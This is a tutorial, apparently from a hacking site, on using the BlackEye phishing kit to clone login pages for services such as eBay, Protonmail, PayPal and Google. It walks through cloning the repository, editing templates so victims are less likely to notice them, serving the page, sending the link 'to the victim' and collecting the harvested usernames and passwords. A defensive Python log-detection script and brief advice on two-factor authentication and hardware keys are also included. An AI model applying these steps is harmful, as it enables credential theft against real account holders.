Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on sites such as Facebook, Instagram and Twitter are often based on phishing. These password-stealing attacks rely on deceiving users into entering their passwords on a convincingly fake website, and they have become increasingly easy to carry out thanks to tools like BlackEye.
BlackEye is a tool for quickly generating phishing pages that target social media sites, making it much easier to phish targets of opportunity on the same network. After redirecting a target to the phishing site, it is easy to capture the social media passwords that unsuspecting users type into it.
Users rely heavily on their social media accounts, and if 2FA is not enabled it can be surprisingly easy for an attacker to get into them. Simply typing a password on the wrong website can be all it takes to lose access to your account. BlackEye is a proof of concept that demonstrates how these phishing sites do not need to be sophisticated or customized to work effectively.
BlackEye is a simple bash script that presents several templates to choose from, letting you pick which social media site to emulate. From there, it creates a functional phishing site on your device, which can then be port-forwarded or otherwise made reachable from your target's machine.
BlackEye supports 32 different phishing templates, but they vary in quality. It is best to test them before they are distributed, because some suffer from deficiencies that can give them away if a user notices. While the stock phishing pages that come with BlackEye are quite good, it is always worth modifying them, for example to remove things like a copyright notice from the wrong year.
Among the more interesting sites that BlackEye supports are Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal and Google. You can test these quickly by following the steps below and clicking on the phishing URL to find out how realistic each template looks before using it.
BlackEye is an extremely simple tool but works best on Kali Linux. It relies on a number of dependencies to run, but these can be installed as needed on Ubuntu or Debian devices. Once you have a Kali distro fully updated, you should be ready to install BlackEye.
Step 1: Download and test BlackEye
First, we must clone the source from BlackEye's GitHub repository. To do so, open a new terminal window and run the following git and cd commands.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into 'blackeye'...
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
This clones the BlackEye repository and lets you run it from the blackeye directory with the command bash blackeye.sh. When we run the command, we should see the splash screen below.
~/blackeye$ bash blackeye.sh
:: Disclaimer: Developers take no responsibility and are not ::
:: responsible for any abuse or damage caused by BlackEye.   ::
:: Use only for educational purposes!!                       ::
:: Attacking targets without mutual consent is illegal!      ::

BLACKEYE v1.1
[01] Instagram      [17] IGFollowers      [33] Custom
[02] Facebook       [18] eBay
[03] Snapchat       [19] Pinterest
[04] Twitter        [20] CryptoCurrency
[05] Github         [21] Verizon
[06] Google         [22] DropBox
[07] Spotify        [23] Adobe ID
[08] Netflix        [24] Shopify
[09] PayPal         [25] Messenger
[10] Origin         [26] GitLab
[11] Steam          [27] Twitch
[12] Yahoo          [28] MySpace
[13] Linkedin       [29] Badoo
[14] Protonmail     [30] VK
[15] WordPress      [31] Yandex
[16] Microsoft      [32] devianART

CODED BY: @thelinuxchoice   Upgraded by: @suljot_gjoka
Step 2: Adjust phishing sites
If we don't like something, such as an expired copyright notice, we can change it quite easily. First, exit the script so you are back in the blackeye directory. Then run ls to see the sites folder in the BlackEye repo.
~/blackeye$ ls
blackeye.sh  LICENSE  README.md  sites
We can navigate into it with the command cd sites. Then type ls to see all the phishing site templates available to modify.
~/blackeye$ cd sites
~/blackeye/sites$ ls
adobe           cryptocurrency  facebook  google          linkedin   myspace  paypal      shopify   spotify  twitter  wordpress
badoo           devianart       github    instafollowers  messenger  netflix  pinterest   shopping  steam    verizon  yahoo
create          dropbox         gitlab    instagram       microsoft  origin   protonmail  snapchat  twitch   vk       yandex
To edit Protonmail, we can run cd protonmail and then ls again to see the files in that folder. You should see something similar to the files below.
~/blackeye/sites$ cd protonmail
~/blackeye/sites/protonmail$ ls
index_files  index.php  ip.php  ip.txt  login.html  login.php  saved.ip.txt  saved.usernames.txt
To edit the HTML of the phishing page, open login.html with a text editor; from there you can easily update copyright notices or other details.
To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then run the command bash blackeye.sh to return to the phishing selection menu. Here we choose eBay, which is number 18.
~/blackeye/sites/protonmail$ cd
~$ cd blackeye
~/blackeye$ bash blackeye.sh
[menu as shown in Step 1]
[*] Select an option: 18
When you have entered the number of the site you want to create, press enter. We will then be asked to enter our IP address. If you hit enter without adding one, it will try to detect yours by default, but this won't always work. Once you enter your IP address, you should see something like the message below.
[*] Set your local IP (default 10.0.6.27):
[*] Starting php server...
[*] Send this link to the victim: 192.168.0.16
[*] Waiting victims open the link...
Then navigate to the phishing link in a web browser to see the results of your phishing site.
When you open the site in a browser, it should look like this:
Opening the link causes the script to report the IP address and user agent of each device that accesses the phishing page.
[*] Waiting victims open the link...
[*] IP Found!
[*] IP Address: 192.168.43.142
[*] User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
[*] Saved: shopping/saved.ip.txt
Once the target has entered their credentials, they are redirected to the real eBay page, creating the illusion of a successful login.
On the attacker's side, BlackEye shows us the credentials that our target has just entered.
[*] Waiting for data...
[*] Credentials found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: sites/shopping/saved.usernames.txt
Just like that, we have intercepted and saved the credentials a target entered on our phishing page.
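The flow just described (the victim loads the page, ip.php records their IP and user agent, login.php stores the credentials and bounces them to the real site) leaves a recognizable trail in a web proxy log. The following Python script is an added detection example for defenders, not part of BlackEye or this article; the log line format, the sample lines, the brand list and the 30-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Script names taken from the template directory listing on this page.
HARVEST_PATHS = {"/login.php", "/ip.php"}
# Brands the templates imitate; BlackEye bounces the victim to the real site after the POST.
BRAND_DOMAINS = ("ebay.com", "protonmail.com", "facebook.com", "instagram.com")
WINDOW = timedelta(seconds=30)  # assumed: how soon the bounce follows the credential POST
# Constructed log format: "<ISO timestamp> <client ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")

def parse(line):
    """Parse one log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    u = urlsplit(url)
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "host": u.hostname or "", "path": u.path or "/", "status": status}

def brand_of(host):
    """Return the brand domain a host belongs to, or None for an unrelated host."""
    return next((b for b in BRAND_DOMAINS if host == b or host.endswith("." + b)), None)

def find_harvests(lines):
    """Flag clients that POST to login.php/ip.php on a non-brand host and, within
    WINDOW, fetch a real brand site: the capture-then-redirect pattern above."""
    recs = sorted(filter(None, map(parse, lines)), key=lambda r: r["ts"])
    hits = []
    for i, r in enumerate(recs):
        if r["method"] != "POST" or r["path"] not in HARVEST_PATHS or brand_of(r["host"]):
            continue  # not a credential POST, or a POST to the genuine site
        for later in recs[i + 1:]:
            if later["ts"] - r["ts"] > WINDOW:
                break
            if later["client"] == r["client"] and brand_of(later["host"]):
                hits.append((r["client"], r["host"], brand_of(later["host"])))
                break
    return hits

# Constructed sample: 10.0.6.40 walks the BlackEye flow; 10.0.6.41 logs in to the real site.
SAMPLE_LOG = [
    "2024-05-01T10:00:00 10.0.6.40 GET http://192.168.0.16/ 200",
    "2024-05-01T10:00:01 10.0.6.40 GET http://192.168.0.16/ip.php 200",
    "2024-05-01T10:00:20 10.0.6.40 POST http://192.168.0.16/login.php 302",
    "2024-05-01T10:00:21 10.0.6.40 GET https://www.ebay.com/ 200",
    "2024-05-01T10:05:00 10.0.6.41 POST https://signin.ebay.com/login.php 200",
]
```

Running find_harvests(SAMPLE_LOG) returns one hit for 10.0.6.40 posting to 192.168.0.16 before landing on ebay.com, while the genuine login from 10.0.6.41 is ignored.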
Phishing Social Media Sites Is Fast & Easy
When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single mistake can cause your password to be stolen and used by an attacker to access your account. So set up 2FA on Facebook, Instagram and any other accounts you have.
Another step toward improving security is to use a hardware security key, which requires new devices to present your key to log in and makes stolen passwords and even intercepted text messages worthless. Keep in mind that while BlackEye makes phishing easy, it doesn't make it legal to steal passwords for accounts that you do not have permission to access.
I hope you liked this social media password guide! If you have any questions about this tutorial on social media phishing tools, please ask below, and if you have a comment or idea for a future section, feel free to reach me on Twitter @KodyKinzie.